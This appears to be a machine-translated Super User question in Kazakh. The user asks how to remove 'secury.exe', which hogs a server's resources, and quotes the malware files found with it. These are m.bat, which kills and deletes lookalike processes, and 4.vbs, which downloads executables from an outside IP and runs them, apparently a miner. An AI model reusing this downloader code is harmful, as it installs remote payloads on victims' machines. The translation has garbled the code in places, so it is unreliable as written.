windows - Бумен тұтынушыны жүктеу жолын мүлдем қалай жоюға болады - Super User

Менің тапсырма менеджерімде келесі жағдай бар:

Менің тапсырма менеджерімде келесі жағдай бар:

Мен қандай бағдарлама екенін білмеймін, бірақ оны орнатпағанымды және оны жою мүмкін болмағандықтан, Steam client bootstrapper емес екенімді білемін.

Егер қандай да бір бағдарламаны осы қадам арқылы білуге ​​тырыссам:

Мен осындай нәрсені көремін:

MS Config утилитасында secury.exe секілді ештеңе таппадым.

Файлдың орнын ашқан кезде үш файлды көремін:

m.bat, b.exe, 4.vbs.

Төменде m.bat мазмұны шығады:

taskkill / f / t / im secury.exe c: \ ProgramData \ secury.exe taskkill / f / t / im kingsoft.exe taskkill / f / t / im expl0rer.exe taskkill / f / t / im ieplare.exev taskkill / f / t / im nssm.exe taskkill / f / t / im MSASCui.exe taskkill / f / t / im SystemSettlngs.exe taskkill / f / t / im SystemSetting.exe taskkill / f / t / im Process.exe taskkill / f / t / im winlnlt.exe taskkill / f / t / im WindowsUpgrade.exe taskkill / f / t / im msdc.exe taskkill / f / t / im Fiddlere.exe taskkill / f / t / im shovst.exe taskkill / f / t / im lqrtqe.exe taskkill / f / t / im apkls.exe taskkill / f / t / im winlog.exe taskkill / f / t / im svchosts.exe taskkill / f / t / im win1ogins.exe taskkill / f / t / im shovsts.exe taskkill / f / t / im fcty.exe taskkill / f / t / im soiuos.exe taskkill / f / t / im TrustedInstaller.exe файлын C: \ Windows \ System32 \ soiuos.exe C: \ ProgramData \ explor0rer.exe файлын C: \ ProgramData \ ieplare.exe арқылы C: \ ProgramData \ nssm.exe арқылы C: \ Windows \ Setup \ TrustedInstaller.exe del C: \ ProgramData \ ProgramData \ MSASCui.exe del C: \ Pro C: \ ProgramData \ Process.exe файлын C: \ ProgramData \ winlnlt.exe арқылы C: \ ProgramData \ WindowsUpgrade.exe C: \ ProgramData \ msdc.exe файлына қосыңыз: C: \ ProgramData \ SystemSetting.exe delData \ SystemSettlngs.exe del C: \ ProgramData \ C: \ ProgramData \ apkls.exe C: \ ProgramData \ Fiddlere.exe del C: \ ProgramData \ shovst.exe файлын C: \ ProgramData \ lqrtqe.exe файлынан табуға болады C: \ ProgramData \ winlog.exe del C: \ ProgramData C: \ ProgramData \ fcty.exe C: \ ProgramData \ pool.exe del C: \ ProgramData \ win1ogins.exe C: \ ProgramData \ shovsts.exe C: \ ProgramData \ C: \ ProgramData \ pool3.exe

Келесі 4.vbs өтеді:

Set xPost = CreateObject («Microsoft.XMLHTTP») xPost.Open «GET», «http://223.68.209.7:65510/2.exe», 0 xPost.Send () Set sGet = CreateObject («ADODB.Stream» sGet.Mode = 3 sGet.Type = 1 sGet.Open () sGet.Write (xPost.responseBody) sGet.SaveToFile «c: \ ProgramData \ s2.exe», 2 Set xPost = CreateObject («Microsoft.XMLHTTP») xPost.Open «GET», «http://223.68.209.7:65510/pool.exe», 0 xPost.Send () Set sGet = CreateObject («ADODB.Stream») sGet.Mode = 3 sGet.Type = 1 sGet.Write (xPost.responseBody) sGet.SaveToFile «c: \ ProgramData \ pool2.exe», 2 CreateObject («WScript.Shell»). «C: \ ProgramData \ pool3.exe» іске қосыңыз CreateObject ( «WScript.Shell») «del C: \ ProgramData \ pool3.exe» іске қосыңыз

Secury.exe файлын менің серверімнің компьютерлік өкілеттіктерін асыра пайдаланудан қалай тоқтатуға болады?

PS Мен компьютерімнің Avast толық тексеруін орындадым, бірақ ол дұрыс емес.

Exe файлын менің серверімнің компьютерлік өкілеттіктерін асыра пайдаланудан қалай тоқтатуға болады?